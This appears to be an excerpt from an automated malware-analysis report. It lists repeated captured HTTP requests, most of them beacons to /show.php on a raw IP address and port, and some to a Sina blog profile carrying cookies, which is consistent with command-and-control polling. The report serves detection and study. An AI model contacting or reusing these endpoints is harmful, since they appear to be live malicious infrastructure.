Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
